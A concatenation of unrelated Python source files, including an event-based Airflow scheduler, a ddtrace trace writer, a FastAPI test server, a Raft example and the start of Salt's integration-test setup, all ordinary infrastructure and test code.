dag_model.next_dagrun, dag_model.next_dagrun_create_after = dag.next_dagrun_info(
dag_model.next_dagrun
)
def _schedule_task(self, scheduling_event: TaskSchedulingEvent):
task_key = TaskInstanceKey(
scheduling_event.dag_id,
scheduling_event.task_id,
scheduling_event.execution_date,
scheduling_event.try_number
)
self.executor.schedule_task(task_key, scheduling_event.action)
def _find_dagruns_by_event(self, event, session) -> Optional[List[DagRun]]:
affect_dag_runs = []
event_key = EventKey(event.key, event.event_type, event.namespace, event.sender)
dag_runs = session \
.query(DagRun).filter(DagRun.state == State.RUNNING).all()
self.log.debug('dag_runs {}'.format(len(dag_runs)))
if dag_runs is None or len(dag_runs) == 0:
return affect_dag_runs
dags = session.query(SerializedDagModel).filter(
SerializedDagModel.dag_id.in_(dag_run.dag_id for dag_run in dag_runs)
).all()
self.log.debug('dags {}'.format(len(dags)))
affect_dags = {}
for dag in dags:
self.log.debug('dag config {}'.format(dag.event_relationships))
self.log.debug('event key {} {} {}'.format(event.key, event.event_type, event.namespace))
dep: DagEventDependencies = DagEventDependencies.from_json(dag.event_relationships)
if dep.is_affect(event_key):
context_extractor: ContextExtractor = dag.context_extractor
try:
event_context: EventContext = context_extractor.extract_context(event)
except Exception as e:
self.log.error(
"Failed to call context extractor, dag {} skips event {}".format(dag.dag_id, event),
exc_info=e)
continue
if event_context is not None:
affect_dags[dag.dag_id] = event_context
if len(affect_dags) == 0:
return affect_dag_runs
for dag_run in dag_runs:
if dag_run.dag_id in affect_dags:
event_context: EventContext = affect_dags[dag_run.dag_id]
if event_context.is_broadcast() or dag_run.context in event_context.get_contexts():
affect_dag_runs.append(dag_run)
return affect_dag_runs
def _find_scheduled_tasks(
self,
dag_run: DagRun,
session: Session,
check_execution_date=False
) -> Optional[List[TI]]:
"""
Make scheduling decisions about an individual dag run
``currently_active_runs`` is passed in so that a batch query can be
used to ask this for all dag runs in the batch, to avoid an n+1 query.
:param dag_run: The DagRun to schedule
:return: scheduled tasks
"""
if not dag_run or dag_run.get_state() in State.finished:
return
try:
dag = dag_run.dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
except SerializedDagNotFound:
self.log.exception("DAG '%s' not found in serialized_dag table", dag_run.dag_id)
return None
if not dag:
self.log.error("Couldn't find dag %s in DagBag/DB!", dag_run.dag_id)
return None
currently_active_runs = session.query(
TI.execution_date,
).filter(
TI.dag_id == dag_run.dag_id,
TI.state.notin_(list(State.finished)),
).distinct().all()
if check_execution_date and dag_run.execution_date > timezone.utcnow() and not dag.allow_future_exec_dates:
self.log.warning("Execution date is in future: %s", dag_run.execution_date)
return None
if dag.max_active_runs and not dag.is_long_running_dag():
if (
len(currently_active_runs) >= dag.max_active_runs
and dag_run.execution_date not in currently_active_runs
):
self.log.warning(
"DAG %s already has %d active runs, not queuing any tasks for run %s",
dag.dag_id,
len(currently_active_runs),
dag_run.execution_date,
)
self._verify_integrity_if_dag_changed(dag_run=dag_run, session=session)
schedulable_tis, callback_to_run = dag_run.update_state(session=session, execute_callbacks=False)
dag_run.schedule_tis(schedulable_tis, session)
session.commit()
query = (session.query(TI)
.outerjoin(TI.dag_run)
.filter(DR.run_id == dag_run.run_id)
.join(TI.dag_model)
.filter(not_(DM.is_paused))
.filter(TI.state == State.SCHEDULED)
.options(selectinload('dag_model')))
scheduled_tis: List[TI] = with_row_locks(
query,
of=TI,
**skip_locked(session=session),
).all()
return scheduled_tis
def _find_downstream_tasks(self, task_id, dag_run, session) -> Optional[List[TI]]:
tasks = self._find_scheduled_tasks(dag_run, session)
if not tasks or len(tasks) == 0:
return None
dag = self.dagbag.get_dag(dag_run.dag_id, session=session)
downstream_task_ids = dag.task_dict.get(task_id).downstream_task_ids
res = []
for task in tasks:
if task.task_id in downstream_task_ids:
res.append(task)
return res
@provide_session
def _verify_integrity_if_dag_changed(self, dag_run: DagRun, session=None):
"""Only run DagRun.verify integrity if Serialized DAG has changed since it is slow"""
latest_version = SerializedDagModel.get_latest_version_hash(dag_run.dag_id, session=session)
if dag_run.dag_hash == latest_version:
self.log.debug("DAG %s not changed structure, skipping dagrun.verify_integrity", dag_run.dag_id)
return
dag_run.dag_hash = latest_version
# Refresh the DAG
dag_run.dag = self.dagbag.get_dag(dag_id=dag_run.dag_id, session=session)
# Verify integrity also takes care of session.flush
dag_run.verify_integrity(session=session)
def _send_scheduling_task_event(self, ti: Optional[TI], action: SchedulingAction):
if ti is None or action == SchedulingAction.NONE:
return
with create_session() as session:
ti.state = State.QUEUED
session.commit()
task_scheduling_event = TaskSchedulingEvent(
ti.task_id,
ti.dag_id,
ti.execution_date,
ti.try_number,
action
)
self.mailbox.send_message(task_scheduling_event.to_event())
def _send_scheduling_task_events(self, tis: Optional[List[TI]], action: SchedulingAction):
if tis is None:
return
for ti in tis:
self._send_scheduling_task_event(ti, action)
@provide_session
def _emit_pool_metrics(self, session: Session = None) -> None:
pools = models.Pool.slots_stats(session=session)
for pool_name, slot_stats in pools.items():
Stats.gauge(f'pool.open_slots.{pool_name}', slot_stats["open"])
Stats.gauge(f'pool.queued_slots.{pool_name}', slot_stats[State.QUEUED])
Stats.gauge(f'pool.running_slots.{pool_name}', slot_stats[State.RUNNING])
@staticmethod
def _reset_unfinished_task_state(dag_run):
with create_session() as session:
to_be_reset = [s for s in State.unfinished if s not in [State.RUNNING, State.QUEUED]]
tis = dag_run.get_task_instances(to_be_reset, session)
for ti in tis:
ti.state = State.NONE
session.commit()
@provide_session
def restore_unfinished_dag_run(self, session):
dag_runs = DagRun.next_dagruns_to_examine(session, max_number=sys.maxsize).all()
if not dag_runs or len(dag_runs) == 0:
return
for dag_run in dag_runs:
self._reset_unfinished_task_state(dag_run)
tasks = self._find_scheduled_tasks(dag_run, session)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
@provide_session
def heartbeat_callback(self, session: Session = None) -> None:
Stats.incr('scheduler_heartbeat', 1, 1)
@provide_session
def _process_request_event(self, event: RequestEvent, session: Session = None):
try:
message = BaseUserDefineMessage()
message.from_json(event.body)
if message.message_type == UserDefineMessageType.RUN_DAG:
# todo make sure dag file is parsed.
dagrun = self._create_dag_run(message.dag_id, session=session, run_type=DagRunType.MANUAL,
context=message.context)
if not dagrun:
self.log.error("Failed to create dag_run.")
# TODO Need to add ret_code and errro_msg in ExecutionContext in case of exception
self.notification_client.send_event(ResponseEvent(event.request_id, None).to_event())
return
tasks = self._find_scheduled_tasks(dagrun, session, False)
self._send_scheduling_task_events(tasks, SchedulingAction.START)
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
elif message.message_type == UserDefineMessageType.STOP_DAG_RUN:
dag_run = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
self._stop_dag_run(dag_run)
self.notification_client.send_event(ResponseEvent(event.request_id, dag_run.run_id).to_event())
elif message.message_type == UserDefineMessageType.EXECUTE_TASK:
dagrun = DagRun.get_run_by_id(session=session, dag_id=message.dag_id, run_id=message.dagrun_id)
ti: TI = dagrun.get_task_instance(task_id=message.task_id)
self.mailbox.send_message(TaskSchedulingEvent(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=ti.execution_date,
try_number=ti.try_number,
action=SchedulingAction(message.action)
).to_event())
self.notification_client.send_event(ResponseEvent(event.request_id, dagrun.run_id).to_event())
except Exception:
self.log.exception("Error occurred when processing request event.")
def _stop_dag(self, dag_id, session: Session):
"""
Stop the dag. Pause the dag and cancel all running dag_runs and task_instances.
"""
DagModel.get_dagmodel(dag_id, session)\
.set_is_paused(is_paused=True, including_subdags=True, session=session)
active_runs = DagRun.find(dag_id=dag_id, state=State.RUNNING)
for dag_run in active_runs:
self._stop_dag_run(dag_run)
def _stop_dag_run(self, dag_run: DagRun):
dag_run.stop_dag_run()
for ti in dag_run.get_task_instances():
if ti.state in State.unfinished:
self.executor.schedule_task(ti.key, SchedulingAction.STOP)
self.mailbox.send_message(DagRunFinishedEvent(dag_id=dag_run.dag_id,
execution_date=dag_run.execution_date).to_event())
class SchedulerEventWatcher(EventWatcher):
def __init__(self, mailbox):
self.mailbox = mailbox
def process(self, events: List[BaseEvent]):
for e in events:
self.mailbox.send_message(e)
class EventBasedSchedulerJob(BaseJob):
"""
1. todo self heartbeat
"""
__mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}
def __init__(self, dag_directory,
notification_server_uri=None,
event_start_time=None,
max_runs=-1,
refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
*args, **kwargs):
super().__init__(*args, **kwargs)
if notification_server_uri is None:
notification_server_uri = conf.get('scheduler', 'notification_server_uri', fallback='127.0.0.1:50052')
self.log.info("Starting event based scheduler with notification server uri: {}".format(notification_server_uri))
self.mailbox: Mailbox = Mailbox()
self.dag_trigger: DagTrigger = DagTrigger(
dag_directory=dag_directory,
max_runs=max_runs,
dag_ids=None,
pickle_dags=False,
mailbox=self.mailbox,
refresh_dag_dir_interval=refresh_dag_dir_interval,
notification_server_uri=notification_server_uri
)
self.task_event_manager = DagRunEventManager(self.mailbox)
self.executor.set_mailbox(self.mailbox)
self.executor.set_notification_server_uri(notification_server_uri)
self.notification_client: NotificationClient = NotificationClient(server_uri=notification_server_uri,
default_namespace=SCHEDULER_NAMESPACE)
self.periodic_manager = PeriodicManager(self.mailbox)
self.scheduler: EventBasedScheduler = EventBasedScheduler(
self.id,
self.mailbox,
self.task_event_manager,
self.executor,
self.notification_client,
notification_server_uri,
None,
self.periodic_manager
)
self.last_scheduling_id = self._last_scheduler_job_id()
self.need_recover_state = False
self.last_event_version = None
if event_start_time is None:
if self.last_scheduling_id is None:
self.start_time = int(time.time() * 1000)
else:
# need recover the state of the scheduler
self.start_time, self.last_event_version = self._get_progress(self.last_scheduling_id)
self.need_recover_state = True
else:
self.start_time = event_start_time
self.log.info('Progress {} {}'.format(self.start_time, self.last_event_version))
@staticmethod
def _last_scheduler_job_id():
last_run = EventBasedSchedulerJob.most_recent_job()
if not last_run:
return None
else:
return last_run.id
@staticmethod
def _get_progress(scheduling_job_id):
progress = get_event_progress(scheduling_job_id)
if progress is None:
return int(time.time() * 1000), None
else:
return progress.last_event_time, progress.last_event_version
def _execute(self):
# faulthandler.enable()
self.log.info("Starting the scheduler Job")
# DAGs can be pickled for easier remote execution by some executors
# pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS
try:
self.mailbox.set_scheduling_job_id(self.id)
self.mailbox.start()
self.scheduler.id = self.id
self.dag_trigger.start()
self.task_event_manager.start()
self.executor.job_id = self.id
self.periodic_manager.start()
self.register_signals()
# Start after resetting orphaned tasks to avoid stressing out DB.
execute_start_time = timezone.utcnow()
self.scheduler.submit_sync_thread()
if self.need_recover_state:
self.scheduler.recover(self.last_scheduling_id)
self._set_event_progress()
self._start_listen_events()
self.executor.start()
self._run_scheduler_loop()
self._stop_listen_events()
self.periodic_manager.shutdown()
self.dag_trigger.end()
self.task_event_manager.end()
self.executor.end()
self.mailbox.stop()
settings.Session.remove() # type: ignore
except Exception as e: # pylint: disable=broad-except
self.log.exception("Exception when executing scheduler, %s", e)
finally:
self.log.info("Exited execute loop")
def _run_scheduler_loop(self) -> None:
self.log.info("Starting the scheduler loop.")
self.scheduler.restore_unfinished_dag_run()
should_continue = True
while should_continue:
try:
should_continue = self.scheduler.schedule()
self.heartbeat(only_if_necessary=True)
except Exception as e:
traceback.print_exc()
self.log.error('Scheduler error [%s]', traceback.format_exc())
time.sleep(1)
self.scheduler.stop_timer()
def _set_event_progress(self):
create_or_update_progress(scheduling_job_id=self.id,
last_event_time=self.start_time,
last_event_version=self.last_event_version)
def _start_listen_events(self):
watcher = SchedulerEventWatcher(self.mailbox)
self.notification_client.start_listen_events(
watcher=watcher,
start_time=self.start_time,
version=self.last_event_version
)
def _stop_listen_events(self):
self.notification_client.stop_listen_events()
def register_signals(self) -> None:
"""Register signals that stop child processes"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
signal.signal(signal.SIGUSR2, self._debug_dump)
def _exit_gracefully(self, signum, frame) -> None: # pylint: disable=unused-argument
"""Helper method to clean up processor_agent to avoid leaving orphan processes."""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
sys.exit(os.EX_OK)
def _debug_dump(self, signum, frame): # pylint: disable=unused-argument
try:
sig_name = signal.Signals(signum).name # pylint: disable=no-member
except Exception: # pylint: disable=broad-except
sig_name = str(signum)
self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)
self.executor.debug_dump()
self.log.info("-" * 80)
def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING
and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
|
writer.py |
# stdlib
import atexit
import logging
import threading
import random
import os
import time
from ddtrace import api
log = logging.getLogger(__name__)
MAX_TRACES = 1000
MAX_SERVICES = 1000
DEFAULT_TIMEOUT = 5
class AgentWriter(object):
def __init__(self, hostname='localhost', port=8126):
self._pid = None
self._traces = None
self._services = None
self._worker = None
self.api = api.API(hostname, port)
def write(self, spans=None, services=None):
# if the worker needs to be reset, do it.
self._reset_worker()
if spans:
self._traces.add(spans)
if services:
self._services.add(services)
def _reset_worker(self):
# if this queue was created in a different process (i.e. this was
# forked) reset everything so that we can safely work from it.
pid = os.getpid()
if self._pid != pid:
log.debug("resetting queues. pids(old:%s new:%s)", self._pid, pid)
self._traces = Q(max_size=MAX_TRACES)
self._services = Q(max_size=MAX_SERVICES)
self._worker = None
self._pid = pid
# ensure we have an active thread working on this queue
if not self._worker or not self._worker.is_alive():
self._worker = AsyncWorker(self.api, self._traces, self._services)
class AsyncWorker(object):
def __init__(self, api, trace_queue, service_queue, shutdown_timeout=DEFAULT_TIMEOUT):
self._trace_queue = trace_queue
self._service_queue = service_queue
self._lock = threading.Lock()
self._thread = None
self._shutdown_timeout = shutdown_timeout
self.api = api
self.start()
def is_alive(self):
return self._thread.is_alive()
def start(self):
with self._lock:
if not self._thread:
log.debug("starting flush thread")
self._thread = threading.Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
atexit.register(self._on_shutdown)
def stop(self):
"""
Close the trace queue so that the worker will stop the execution
"""
with self._lock:
if self._thread and self.is_alive():
self._trace_queue.close()
def join(self, timeout=2):
"""
Wait for the AsyncWorker execution. This call doesn't block the execution
and it has a 2 seconds of timeout by default.
"""
self._thread.join(timeout)
def _on_shutdown(self):
with self._lock:
if not self._thread:
return
# wait for in-flight queues to get traced.
time.sleep(0.1)
self._trace_queue.close()
size = self._trace_queue.size()
if size:
key = "ctrl-break" if os.name == 'nt' else 'ctrl-c'
log.debug("Waiting %ss for traces to be sent. Hit %s to quit.",
self._shutdown_timeout, key)
timeout = time.time() + self._shutdown_timeout
while time.time() < timeout and self._trace_queue.size():
# FIXME[matt] replace with a queue join
time.sleep(0.05)
def _target(self):
while True:
traces = self._trace_queue.pop()
if traces:
# If we have data, let's try to send it.
try:
self.api.send_traces(traces)
except Exception as err:
log.error("cannot send spans: {0}".format(err))
services = self._service_queue.pop()
if services:
try:
self.api.send_services(services)
except Exception as err:
log.error("cannot send services: {0}".format(err))
elif self._trace_queue.closed():
# no traces and the queue is closed. our work is done.
return
time.sleep(1) # replace with a blocking pop.
class Q(object):
"""
Q is a threadsafe queue that let's you pop everything at once and
will randomly overwrite elements when it's over the max size.
"""
def __init__(self, max_size=1000):
self._things = []
self._lock = threading.Lock()
self._max_size = max_size
self._closed = False
def size(self):
with self._lock:
return len(self._things)
def close(self):
with self._lock:
self._closed = True
def closed(self):
with self._lock:
return self._closed
def add(self, thing):
with self._lock:
if self._closed:
return False
if len(self._things) < self._max_size or self._max_size <= 0:
self._things.append(thing)
return True
else:
idx = random.randrange(0, len(self._things))
self._things[idx] = thing
def pop(self):
with self._lock:
if not self._things:
return None
things = self._things
self._things = []
return things
|
conftest.py | from pytest import fixture
from threading import Thread
from mm_ide import ide
@fixture(scope="function")
def start_ui():
Thread(target=ide.main).start()
|
simple_text_generation.py | # Copyright 2021 Sony Group Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import threading
import argparse
import nltk
from simple_text_generation_util.simple_text_generation_util import generate_text
def func(args):
try:
nltk.tokenize.word_tokenize("test")
except LookupError:
nltk.download('punkt')
generate_text(args, nltk.tokenize.word_tokenize, ' ')
def main():
parser = argparse.ArgumentParser(
description='Simple Text Generation\n' +
'\n' +
'Generates a text based on a model that predicts the next word ' +
'based on the word index series and its length' +
'', formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-m',
'--model',
help='path to model nnp file (model) default=results.nnp',
required=True,
default='results.nnp')
parser.add_argument(
'-v',
'--input-variable',
help='variable name for input data (variable) default=x',
default='x')
parser.add_argument(
'-l',
'--length-variable',
help='variable name for text length (variable) default=l',
default='l')
parser.add_argument(
'-d',
'--index-file-input',
help='index file input (csv)',
required=True)
parser.add_argument(
'-s', '--seed-text', help='seed text (text), default=I am')
parser.add_argument(
'-n',
'--normalize',
help='normalize characters in seed text with unicodedata (bool) default=True',
action='store_true')
parser.add_argument(
'-b',
'--mode',
help='mode (option:sampling,beam-search) default=sampling',
default='sampling')
parser.add_argument(
'-t',
'--temperature',
help='temperature parameter for sampling mode(float), default=0.5',
type=float,
default=0.5)
parser.add_argument(
'-e',
'--num-text',
help='number of text to generate, beam-width for beam search (int), default=8',
type=int,
default=8)
parser.add_argument(
'-o',
'--output',
help='path to output image file (csv) default=text_generation.csv',
required=True,
default='text_generation.csv')
parser.set_defaults(func=func)
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
# thread.stack_size(8 * 1024 * 1024)
sys.setrecursionlimit(1024 * 1024)
main_thread = threading.Thread(target=main)
main_thread.start()
main_thread.join()
|
fast_api_test_server.py | import logging
import threading
import time
from typing import Optional
from fastapi import FastAPI
from starlette.requests import Request
from starlette.responses import Response
from uvicorn.config import Config
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer, CustomServer
class FastApiPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = FastAPI(
title="FastAPI Example Server",
description="Demonstrate Spring Boot Admin Integration with FastAPI",
docs_url="/api",
)
self.pyctuator = Pyctuator(
self.app,
"FastAPI Pyctuator",
"http://localhost:8000",
"http://localhost:8000/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
)
@self.app.get("/logfile_test_repeater", tags=["pyctuator"])
# pylint: disable=unused-variable
def logfile_test_repeater(repeated_string: str) -> str:
logging.error(repeated_string)
return repeated_string
self.server = CustomServer(config=(Config(app=self.app, loop="asyncio")))
self.thread = threading.Thread(target=self.server.run)
@self.app.get("/httptrace_test_url")
# pylint: disable=unused-variable
def get_httptrace_test_url(request: Request, sleep_sec: Optional[int]) -> Response:
# Sleep if requested to sleep - used for asserting httptraces timing
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(sleep_sec)
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
return Response(headers={"resp-data": str(request.headers.get("User-Data"))}, content="my content")
def start(self) -> None:
self.thread.start()
while not self.server.started:
time.sleep(0.01)
def stop(self) -> None:
self.pyctuator.stop()
self.server.should_exit = True
self.thread.join()
|
io_utils.py | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2020 Alibaba Group Holding Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import threading
from queue import Queue
from tqdm import tqdm
class LoadingProgressTracker:
progbar = None
cur_stub = 0
stubs = [
"PROGRESS--GRAPH-LOADING-READ-VERTEX-0",
"PROGRESS--GRAPH-LOADING-READ-VERTEX-100",
"PROGRESS--GRAPH-LOADING-READ-EDGE-0",
"PROGRESS--GRAPH-LOADING-READ-EDGE-100",
"PROGRESS--GRAPH-LOADING-CONSTRUCT-VERTEX-0",
"PROGRESS--GRAPH-LOADING-CONSTRUCT-VERTEX-100",
"PROGRESS--GRAPH-LOADING-CONSTRUCT-EDGE-0",
"PROGRESS--GRAPH-LOADING-CONSTRUCT-EDGE-100",
"PROGRESS--GRAPH-LOADING-SEAL-0",
"PROGRESS--GRAPH-LOADING-SEAL-100",
]
class StdStreamWrapper(object):
def __init__(self, std_stream, queue=None, drop=True):
self._stream_backup = std_stream
if queue is None:
self._lines = Queue()
else:
self._lines = queue
self._drop = drop
@property
def stdout(self):
return self._stream_backup
@property
def stderr(self):
return self._stream_backup
def drop(self, drop=True):
self._drop = drop
def write(self, line):
line = self._filter_progress(line)
if line is None:
return
line = line.encode("ascii", "ignore").decode("ascii")
self._stream_backup.write(line)
if not self._drop:
self._lines.put(line)
def flush(self):
self._stream_backup.flush()
def poll(self, block=True, timeout=None):
return self._lines.get(block=block, timeout=timeout)
def _show_progress(self):
total = len(LoadingProgressTracker.stubs)
if LoadingProgressTracker.progbar is None:
LoadingProgressTracker.progbar = tqdm(
desc="Loading Graph", total=total, file=sys.stderr
)
LoadingProgressTracker.progbar.update(1)
LoadingProgressTracker.cur_stub += 1
if LoadingProgressTracker.cur_stub == total:
LoadingProgressTracker.cur_stub = 0
LoadingProgressTracker.progbar.close()
LoadingProgressTracker.progbar = None
sys.stderr.flush()
def _filter_progress(self, line):
# print('show_progress: ', len(line), ", ", line)
if "PROGRESS--GRAPH" not in line:
return line
self._show_progress()
return None
class PipeWatcher(object):
def __init__(self, pipe, sink, queue=None, drop=True):
"""Watch a pipe, and buffer its output if drop is False."""
self._pipe = pipe
self._sink = sink
self._drop = drop
if queue is None:
self._lines = Queue()
else:
self._lines = queue
def read_and_poll(self):
for line in self._pipe:
try:
self._sink.write(line)
except: # noqa: E722
pass
try:
if not self._drop:
self._lines.put(line)
except: # noqa: E722
pass
self._polling_thread = threading.Thread(target=read_and_poll, args=(self,))
self._polling_thread.daemon = True
self._polling_thread.start()
def poll(self, block=True, timeout=None):
return self._lines.get(block=block, timeout=timeout)
def drop(self, drop=True):
self._drop = drop
|
raft_example.py | #!/usr/bin/env python3
import argparse
import logging
import socketserver
import threading
import time
import random
from raft_node import Node
from raft_peer import Peer
from raft_states import NodePersistentState
from raft_state_machine import DummyStateMachine
from raft_rpc_client import RpcClient
from raft_messages import VoteMessage
logging.basicConfig(format='%(asctime)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')
def parse_peer(peer_str):
peer_id, peer_host, peer_port_str = peer_str.split(":")
return int(peer_id), peer_host, int(peer_port_str)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--node_id", type=int, default=0)
parser.add_argument("--port", type=int, default=9999)
parser.add_argument("--host", type=str, default="0.0.0.0")
parser.add_argument("--peers", type=str, nargs="+", default=[])
parser.add_argument("--state", type=str, default="./state.json")
parser.add_argument("--random_seed", type=int, default=0)
args = parser.parse_args()
random.seed(args.random_seed)
socketserver.TCPServer.allow_reuse_address = True
peers = []
for i, peer_str in enumerate(args.peers):
peer_id, host, port = parse_peer(peer_str)
p = Peer(peer_id, host, port)
peers.append(p)
prev_state = NodePersistentState.load(args.state)
state_machine = DummyStateMachine()
node = Node(args.node_id, prev_state, peers, state_machine)
node_thread = threading.Thread(target=node.start, args=[args.host, args.port])
node_thread.daemon = True
node_thread.start()
testingRPCClient = False # Add to test RPC Client. Continuing example
if testingRPCClient:
client = RpcClient()
try:
while True:
if testingRPCClient:
if args.node_id == 0:
t, s = client.send(peers[0], VoteMessage(term=0, candidate_id=0, last_log_idx=0, last_log_term=0))
print("Term", t, "Success?:", s)
time.sleep(1)
except KeyboardInterrupt:
raise SystemExit
finally:
node.stop()
if __name__ == '__main__':
main()
|
__init__.py | # -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import print_function
import os
import re
import sys
import time
import errno
import shutil
import pprint
import logging
import tempfile
import subprocess
import multiprocessing
from hashlib import md5
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
STATE_FUNCTION_RUNNING_RE = re.compile(
r'''The function (?:"|')(?P<state_func>.*)(?:"|') is running as PID '''
r'(?P<pid>[\d]+) and was started at (?P<date>.*) with jid (?P<jid>[\d]+)'
)
INTEGRATION_TEST_DIR = os.path.dirname(
os.path.normpath(os.path.abspath(__file__))
)
CODE_DIR = os.path.dirname(os.path.dirname(INTEGRATION_TEST_DIR))
SALT_LIBS = os.path.dirname(CODE_DIR)
# Import Salt Testing libs
from salttesting import TestCase
from salttesting.case import ShellTestCase
from salttesting.mixins import CheckShellBinaryNameAndVersionMixIn
from salttesting.parser import PNUM, print_header, SaltTestcaseParser
from salttesting.helpers import ensure_in_syspath, RedirectStdStreams
# Update sys.path
ensure_in_syspath(CODE_DIR, SALT_LIBS)
# Import Salt libs
import salt
import salt._compat
import salt.config
import salt.master
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils
from salt.utils import fopen, get_colors
from salt.utils.verify import verify_env
# Import 3rd-party libs
import yaml
# Gentoo Portage prefers ebuild tests are rooted in ${TMPDIR}
SYS_TMP_DIR = os.environ.get('TMPDIR', tempfile.gettempdir())
TMP = os.path.join(SYS_TMP_DIR, 'salt-tests-tmpdir')
FILES = os.path.join(INTEGRATION_TEST_DIR, 'files')
PYEXEC = 'python{0}.{1}'.format(*sys.version_info)
MOCKBIN = os.path.join(INTEGRATION_TEST_DIR, 'mockbin')
SCRIPT_DIR = os.path.join(CODE_DIR, 'scripts')
TMP_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-state-tree')
TMP_PRODENV_STATE_TREE = os.path.join(SYS_TMP_DIR, 'salt-temp-prodenv-state-tree')
TMP_CONF_DIR = os.path.join(TMP, 'config')
log = logging.getLogger(__name__)
def skip_if_binaries_missing(binaries, check_all=False):
# While there's no new release of salt-testing
def _id(obj):
return obj
if sys.version_info < (2, 7):
from unittest2 import skip # pylint: disable=F0401
else:
from unittest import skip # pylint: disable=E0611
if check_all:
for binary in binaries:
if salt.utils.which(binary) is None:
return skip(
'The {0!r} binary was not found'
)
elif salt.utils.which_bin(binaries) is None:
return skip(
'None of the following binaries was found: {0}'.format(
', '.join(binaries)
)
)
return _id
def run_tests(*test_cases, **kwargs):
'''
Run integration tests for the chosen test cases.
Function uses optparse to set up test environment
'''
needs_daemon = kwargs.pop('needs_daemon', True)
if kwargs:
raise RuntimeError(
'The \'run_tests\' function only accepts \'needs_daemon\' as a '
'keyword argument'
)
class TestcaseParser(SaltTestcaseParser):
def setup_additional_options(self):
self.add_option(
'--sysinfo',
default=False,
action='store_true',
help='Print some system information.'
)
self.output_options_group.add_option(
'--no-colors',
'--no-colours',
default=False,
action='store_true',
help='Disable colour printing.'
)
def run_testcase(self, testcase, needs_daemon=True): # pylint: disable=W0221
if needs_daemon:
print(' * Setting up Salt daemons to execute tests')
with TestDaemon(self):
return SaltTestcaseParser.run_testcase(self, testcase)
return SaltTestcaseParser.run_testcase(self, testcase)
parser = TestcaseParser()
parser.parse_args()
for case in test_cases:
if parser.run_testcase(case, needs_daemon=needs_daemon) is False:
parser.finalize(1)
parser.finalize(0)
class TestDaemon(object):
'''
Set up the master and minion daemons, and run related cases
'''
MINIONS_CONNECT_TIMEOUT = MINIONS_SYNC_TIMEOUT = 120
def __init__(self, parser):
self.parser = parser
self.colors = get_colors(self.parser.options.no_colors is False)
def __enter__(self):
'''
Start a master and minion
'''
running_tests_user = pwd.getpwuid(os.getuid()).pw_name
self.master_opts = salt.config.master_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'master')
)
self.master_opts['user'] = running_tests_user
minion_config_path = os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'minion'
)
self.minion_opts = salt.config.minion_config(minion_config_path)
self.minion_opts['user'] = running_tests_user
self.syndic_opts = salt.config.syndic_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic'),
minion_config_path
)
self.syndic_opts['user'] = running_tests_user
#if sys.version_info < (2, 7):
# self.minion_opts['multiprocessing'] = False
self.sub_minion_opts = salt.config.minion_config(
os.path.join(INTEGRATION_TEST_DIR, 'files', 'conf', 'sub_minion')
)
self.sub_minion_opts['root_dir'] = os.path.join(TMP, 'subsalt')
self.sub_minion_opts['user'] = running_tests_user
#if sys.version_info < (2, 7):
# self.sub_minion_opts['multiprocessing'] = False
self.smaster_opts = salt.config.master_config(
os.path.join(
INTEGRATION_TEST_DIR, 'files', 'conf', 'syndic_master'
)
)
self.smaster_opts['user'] = running_tests_user
# Set up config options that require internal data
self.master_opts['pillar_roots'] = {
'base': [os.path.join(FILES, 'pillar', 'base')]
}
self.master_opts['file_roots'] = {
'base': [
os.path.join(FILES, 'file', 'base'),
